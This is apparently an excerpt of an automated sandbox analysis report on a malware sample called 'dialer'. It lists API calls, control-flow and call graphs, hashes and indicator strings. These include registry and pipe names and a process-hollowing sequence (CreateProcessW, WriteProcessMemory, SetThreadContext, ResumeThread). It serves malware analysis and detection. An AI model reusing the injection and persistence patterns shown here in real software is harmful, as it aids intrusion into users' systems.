                                                                        • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                        • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                        • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                        • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                        • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                        • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                                      • ExitProcess.KERNEL32 ref: 0000000140002263
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                                      • String ID:
                                                                      • API String ID: 3836936051-0

                                                                      Control-flow Graph

                                                                      [Control-flow graph of the function at 140002560 (command dispatcher): branches over GetProcessHeap/HeapAlloc/HeapFree, K32EnumProcesses, ReadFile, RegOpenKeyExW, RegDeleteValueW, ShellExecuteW, lstrlenW and ExitProcess, with calls to 140001000, 1400010c0, 1400014d8, 1400016cc, 14000175c, 1400017ec, 1400018ac, 140001944, 1400019c4, 140001c88, 14000217c, 1400021a8 and 140002a90; node dump omitted]
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                                      • String ID: SOFTWARE$dialerstager$open
                                                                      • API String ID: 3276259517-3931493855

                                                                      Control-flow Graph

                                                                      [Control-flow graph of the function at 140001c88: CreateProcessW, VirtualAllocEx, WriteProcessMemory (looped), VirtualAlloc, GetThreadContext, WriteProcessMemory, SetThreadContext, ResumeThread, with an error path through OpenProcess and TerminateProcess; node dump omitted]
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                      • String ID: @
                                                                      • API String ID: 3462610200-2766056989
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                      • String ID: dialersvc64
                                                                      • API String ID: 4184240511-3881820561
                                                                      • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                      • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                                      • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                      • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Delete$CloseEnumOpen
                                                                      • String ID: SOFTWARE\dialerconfig
                                                                      • API String ID: 3013565938-461861421
                                                                      • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                      • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                                      • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                      • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: File$Write$CloseCreateHandle
                                                                      • String ID: \\.\pipe\dialercontrol_redirect64
                                                                      • API String ID: 148219782-3440882674
                                                                      • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                      • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                                      • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                      • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000003F.00000002.2571042961.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 0000003F.00000002.2570893941.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571182406.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 0000003F.00000002.2571321187.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: ntdll.dll
                                                                      • API String ID: 1646373207-2227199552
                                                                      • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                      • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                                      • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                      • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                                      Execution Graph

                                                                      Execution Coverage:2.2%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:899
                                                                      Total number of Limit Nodes:2
calls 2862->2863 2864 14000147c 2863->2864 2865 140001394 2 API calls 2864->2865 2866 14000148b 2865->2866 2867 140001394 2 API calls 2866->2867 2868 14000149a 2867->2868 2869 140001394 2 API calls 2868->2869 2870 1400014a9 2869->2870 2871 140001394 2 API calls 2870->2871 2872 1400014b8 2871->2872 2873 140001394 2 API calls 2872->2873 2874 1400014c7 2873->2874 2875 140001394 2 API calls 2874->2875 2876 1400014d6 2875->2876 2877 1400014e5 2876->2877 2878 140001394 2 API calls 2876->2878 2879 140001394 2 API calls 2877->2879 2878->2877 2880 1400014ef 2879->2880 2881 1400014f4 2880->2881 2882 140001394 2 API calls 2880->2882 2883 140001394 2 API calls 2881->2883 2882->2881 2884 1400014fe 2883->2884 2885 140001503 2884->2885 2886 140001394 2 API calls 2884->2886 2887 140001394 2 API calls 2885->2887 2886->2885 2888 14000150d 2887->2888 2889 140001394 2 API calls 2888->2889 2890 140001512 2889->2890 2891 140001394 2 API calls 2890->2891 2892 140001521 2891->2892 2893 140001394 2 API calls 2892->2893 2894 140001530 2893->2894 2895 140001394 2 API calls 2894->2895 2896 14000153f 2895->2896 2897 140001394 2 API calls 2896->2897 2898 14000154e 2897->2898 2899 140001394 2 API calls 2898->2899 2900 14000155d 2899->2900 2901 140001394 2 API calls 2900->2901 2902 14000156c 2901->2902 2903 140001394 2 API calls 2902->2903 2904 14000157b 2903->2904 2905 140001394 2 API calls 2904->2905 2906 14000158a 2905->2906 2907 140001394 2 API calls 2906->2907 2908 140001599 2907->2908 2909 140001394 2 API calls 2908->2909 2910 1400015a8 2909->2910 2911 140001394 2 API calls 2910->2911 2912 1400015b7 2911->2912 2913 140001394 2 API calls 2912->2913 2914 1400015c6 2913->2914 2915 140001394 2 API calls 2914->2915 2916 1400015d5 2915->2916 2917 140001394 2 API calls 2916->2917 2918 1400015e4 2917->2918 2919 140001394 2 API calls 2918->2919 2920 1400015f3 2919->2920 2920->2363 2922 140001394 2 API calls 2921->2922 2923 140001440 2922->2923 2924 140001394 2 API calls 2923->2924 2925 14000144f 
2924->2925 2926 140001394 2 API calls 2925->2926 2927 14000145e 2926->2927 2928 140001394 2 API calls 2927->2928 2929 14000146d 2928->2929 2930 140001394 2 API calls 2929->2930 2931 14000147c 2930->2931 2932 140001394 2 API calls 2931->2932 2933 14000148b 2932->2933 2934 140001394 2 API calls 2933->2934 2935 14000149a 2934->2935 2936 140001394 2 API calls 2935->2936 2937 1400014a9 2936->2937 2938 140001394 2 API calls 2937->2938 2939 1400014b8 2938->2939 2940 140001394 2 API calls 2939->2940 2941 1400014c7 2940->2941 2942 140001394 2 API calls 2941->2942 2943 1400014d6 2942->2943 2944 1400014e5 2943->2944 2945 140001394 2 API calls 2943->2945 2946 140001394 2 API calls 2944->2946 2945->2944 2947 1400014ef 2946->2947 2948 1400014f4 2947->2948 2949 140001394 2 API calls 2947->2949 2950 140001394 2 API calls 2948->2950 2949->2948 2951 1400014fe 2950->2951 2952 140001503 2951->2952 2953 140001394 2 API calls 2951->2953 2954 140001394 2 API calls 2952->2954 2953->2952 2955 14000150d 2954->2955 2956 140001394 2 API calls 2955->2956 2957 140001512 2956->2957 2958 140001394 2 API calls 2957->2958 2959 140001521 2958->2959 2960 140001394 2 API calls 2959->2960 2961 140001530 2960->2961 2962 140001394 2 API calls 2961->2962 2963 14000153f 2962->2963 2964 140001394 2 API calls 2963->2964 2965 14000154e 2964->2965 2966 140001394 2 API calls 2965->2966 2967 14000155d 2966->2967 2968 140001394 2 API calls 2967->2968 2969 14000156c 2968->2969 2970 140001394 2 API calls 2969->2970 2971 14000157b 2970->2971 2972 140001394 2 API calls 2971->2972 2973 14000158a 2972->2973 2974 140001394 2 API calls 2973->2974 2975 140001599 2974->2975 2976 140001394 2 API calls 2975->2976 2977 1400015a8 2976->2977 2978 140001394 2 API calls 2977->2978 2979 1400015b7 2978->2979 2980 140001394 2 API calls 2979->2980 2981 1400015c6 2980->2981 2982 140001394 2 API calls 2981->2982 2983 1400015d5 2982->2983 2984 140001394 2 API calls 2983->2984 2985 1400015e4 2984->2985 2986 140001394 2 API calls 
2985->2986 2987 1400015f3 2986->2987 2987->2363

                                                                      Callgraph

                                                                      [Callgraph: functions Function_0000000140001000 through Function_00000001400068E0, numbered 0 to 109, with their call edges. The stubs in the range Function_0000000140001404 to Function_00000001400015F3 each call Function_0000000140001394, which in turn calls Function_0000000140006630 and Function_00000001400068E0; Function_0000000140003250 and Function_00000001400027D0 call most of those stubs.]

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • NtQueryAttributesFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                      Memory Dump Source
                                                                      • Source File: 00000040.00000002.2570979485.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000040.00000002.2570879986.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571103847.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571236945.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571360308.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFileQuery
                                                                      • String ID:
                                                                      • API String ID: 2106648053-0
                                                                      • Opcode ID: 7499237b17bbcd1bcb6ebcadcdfb411da627e67431d6b901ef04fbd3b683fc4c
                                                                      • Instruction ID: 6e9c43e43475a5412bc82c74bb0b22b7dbbc15337bd8e373d78586065a7e04e3
                                                                      • Opcode Fuzzy Hash: 7499237b17bbcd1bcb6ebcadcdfb411da627e67431d6b901ef04fbd3b683fc4c
                                                                      • Instruction Fuzzy Hash: BFF05FB6608B408AEA16DF62F85179A77A5F79D7C0F009919BBC857735DB3CC1A0CB40

                                                                      Control-flow Graph

                                                                      [Control-flow graph of function 1400027d0 (basic blocks 1400027d0 through 140002fe4): calls memset, wcsncmp, wcscpy, wcscat, wcslen and the internal functions 140002660, 14000155d, 1400014c7, 140001503, 140006620, 140001370, 1400014e5, 1400014a9, 1400014f4, 14000145e and 140001512.]
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000040.00000002.2570979485.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000040.00000002.2570879986.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571103847.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571236945.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571360308.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                                      • String ID: 0$X$\BaseNamedObjects\ihmypisetxdrqeze$`
                                                                      • API String ID: 780471329-706022866
                                                                      • Opcode ID: 3921cbae5963881bc6c68f0a247accd9290a4b0d67ce47a736d6111980a1c8ca
                                                                      • Instruction ID: 658a3d460bbea879ed104d352b5e20547fe0152a80702ff4edb11cd2fd61066c
                                                                      • Opcode Fuzzy Hash: 3921cbae5963881bc6c68f0a247accd9290a4b0d67ce47a736d6111980a1c8ca
                                                                      • Instruction Fuzzy Hash: 651259B2618B8481E762CB1AF8443EAB7A4F789794F414215EBAC57BF5DF78C189C700

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000040.00000002.2570979485.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000040.00000002.2570879986.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571103847.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571236945.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571360308.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                      • String ID:
                                                                      • API String ID: 2643109117-0
                                                                      • Opcode ID: 06f27df6a5a8c6842c0aa0926d524d878ccdae97ae67cd32ac0202430ab2861b
                                                                      • Instruction ID: 3b7c54f8824839eb892363506706b80bfa4ecf6ac178986dd5ae81438c55b813
                                                                      • Opcode Fuzzy Hash: 06f27df6a5a8c6842c0aa0926d524d878ccdae97ae67cd32ac0202430ab2861b
                                                                      • Instruction Fuzzy Hash: 3A5100F1611A4085FB16EF27F9947EA27A1BB8DBD0F449121FB4E873B2DE3884958700

                                                                      Control-flow Graph

                                                                      [Control-flow graph of function 140001ba0 (basic blocks 140001ba0 through 140001d38): calls VirtualQuery, VirtualProtect, memcpy, GetLastError and the internal functions 1400023b0, 1400024d0 and 140001d40.]
                                                                      APIs
                                                                      • VirtualQuery.KERNEL32(?,?,?,?,0000000140007E78,0000000140007E78,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                      • VirtualProtect.KERNEL32(?,?,?,?,0000000140007E78,0000000140007E78,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                      • memcpy.MSVCRT ref: 0000000140001CE0
                                                                      • GetLastError.KERNEL32(?,?,?,?,0000000140007E78,0000000140007E78,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000040.00000002.2570979485.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000040.00000002.2570879986.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571103847.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571236945.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571360308.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                      • API String ID: 2595394609-2123141913
                                                                      • Opcode ID: c45f2e495a57a430fcf17cc5f9f7c36a08211161c8e288a1daf7c2413b0e0ff9
                                                                      • Instruction ID: 56c79c59800554f2910646d4459934fc4040430f5b8b4933bacb8507526df960
                                                                      • Opcode Fuzzy Hash: c45f2e495a57a430fcf17cc5f9f7c36a08211161c8e288a1daf7c2413b0e0ff9
                                                                      • Instruction Fuzzy Hash: 5D4132B1201A4486FA26DF57F884BE927A0F78DBC4F558126EF0E877B1DA38C586C700

                                                                      Control-flow Graph

                                                                      [Control-flow graph of function 140002104 (basic blocks 140002104 through 140002280): calls EnterCriticalSection, LeaveCriticalSection, TlsGetValue, GetLastError, DeleteCriticalSection and free.]
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000040.00000002.2570979485.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000040.00000002.2570879986.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571103847.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571236945.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000040.00000002.2571360308.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                      • String ID:
                                                                      • API String ID: 3326252324-0
                                                                      • Opcode ID: d8505fa5a18f4eabc9956257ed0cd04a762e9af97d691edbd343adb5f534fcc5
                                                                      • Instruction ID: 1c0e5bfd62e35a66f563209072fa57b55fd1b6a77dba97afdf95615a2cf2fd13
                                                                      • Opcode Fuzzy Hash: d8505fa5a18f4eabc9956257ed0cd04a762e9af97d691edbd343adb5f534fcc5
                                                                      • Instruction Fuzzy Hash: 5F21E3B0305A0192FA6BDB53F9583E82364BB6DBD0F444021FF5A476B4DB7A8986C300

                                                                      Control-flow Graph

                                                                      [Control-flow graph of function 140001e10 (basic blocks 140001e10 through 140001f69): calls signal and the internal function 140006be0.]
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000040.00000002.2570979485.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000040.00000002.2570879986.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571103847.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571236945.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571360308.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CCG
                                                                      • API String ID: 0-1584390748
                                                                      • Opcode ID: e97456c2db4c566f3d7dc493090a254b32206473731b29f9c59ef8b921ac1576
                                                                      • Instruction ID: 0d0cdd76e27464eab58c3101b34b7ecc2a8ef26ebffc61dfa6a838f535d4530f
                                                                      • Opcode Fuzzy Hash: e97456c2db4c566f3d7dc493090a254b32206473731b29f9c59ef8b921ac1576
                                                                      • Instruction Fuzzy Hash: 0E2159B1A0510542FA77DA2BB5903F92182ABCC7E4F258635FF19873F5DF7888C28241

                                                                      Control-flow Graph

                                                                      [Control-flow graph of function 140001880 (basic blocks 140001880 through 140001b98): calls VirtualProtect and the internal functions 140002420, 140002660, 140001ba0 and 140001d40.]
                                                                      APIs
                                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000040.00000002.2570979485.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000040.00000002.2570879986.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571103847.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571236945.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571360308.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                      • API String ID: 544645111-395989641
                                                                      • Opcode ID: 49d3a49e386a9f8c188e9e2036060558ee4c7c00f715509c9333fb618cf9d003
                                                                      • Instruction ID: 0548b3f5b867e70e10a5f74b7648a1561f2d248eb850965c6f162cb2bb9ee00d
                                                                      • Opcode Fuzzy Hash: 49d3a49e386a9f8c188e9e2036060558ee4c7c00f715509c9333fb618cf9d003
                                                                      • Instruction Fuzzy Hash: DD5105B6B11544DAEB12CF67F840BD82761A759BE8F548211FB19077B4DB38C586C700

                                                                      Control-flow Graph

                                                                      Control-flow graph (rendered as an image in the report): function 0x140001800-0x140001867; two entry branches (0x140001812, 0x140001824) merge into a call to 0x140002290 followed by fprintf. With the "_matherr(): %s in %s(%g, %g) (retval=%g)" string below this is the mingw-w64 CRT's default _matherr handler, which prints a math-domain error to stderr.
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000040.00000002.2570979485.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000040.00000002.2570879986.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571103847.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571236945.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571360308.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-3474627141
                                                                      • Opcode ID: ca6b003e7d5e4c1f7dddf901e9dd9bc29e86f15a224b0f641e9277e05f257cb0
                                                                      • Instruction ID: 497f2bda4b805bebb598d258fe75f44a47035596d1a2b2a7541446a23c8471c2
                                                                      • Opcode Fuzzy Hash: ca6b003e7d5e4c1f7dddf901e9dd9bc29e86f15a224b0f641e9277e05f257cb0
                                                                      • Instruction Fuzzy Hash: 61F0F671A14A4482E212EF2AB9413ED6360E74D3C0F40D211FF4DA32A1DF3CD182C310

                                                                      Control-flow Graph

                                                                      Control-flow graph (rendered as an image in the report): function 0x14000219e-0x140002280. Inside EnterCriticalSection (0x1400021ab) / LeaveCriticalSection (0x140002265) it loops over TlsGetValue and GetLastError (0x1400021e9), i.e. the mingw-w64 CRT's TLS destructor callback walking its per-thread key list (tlsthrd.c); CRT housekeeping, not payload logic.
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000040.00000002.2570979485.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000040.00000002.2570879986.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571103847.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571236945.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000040.00000002.2571360308.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                      • String ID:
                                                                      • API String ID: 682475483-0
                                                                      • Opcode ID: 8305f613180582c6540d5c60a31bd7587548d14b8a6b1963720f8d95c6f0d6cf
                                                                      • Instruction ID: a14c2e05b7dfa99361cb055dd0f188929d912ab55c595d3c1c1369cf37f0666f
                                                                      • Opcode Fuzzy Hash: 8305f613180582c6540d5c60a31bd7587548d14b8a6b1963720f8d95c6f0d6cf
                                                                      • Instruction Fuzzy Hash: F301B2B5305A0192FA6BDB53FE483D86364BB6CBD1F854021EF0953AB4DB7AC996C300

                                                                      Execution Graph

                                                                      Execution Coverage:56.2%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:87.5%
                                                                      Total number of Nodes:8
                                                                      Total number of Limit Nodes:1

                                                                      Callgraph

                                                                      Callgraph (rendered as an image in the report): Function_0000000140846070 -> Function_00000001408460F0 -> Function_0000000140846321 and Function_00000001408460B2. Four functions in total, all in the 0x140846000 region of the rewritten image in process 65.

                                                                      Control-flow Graph

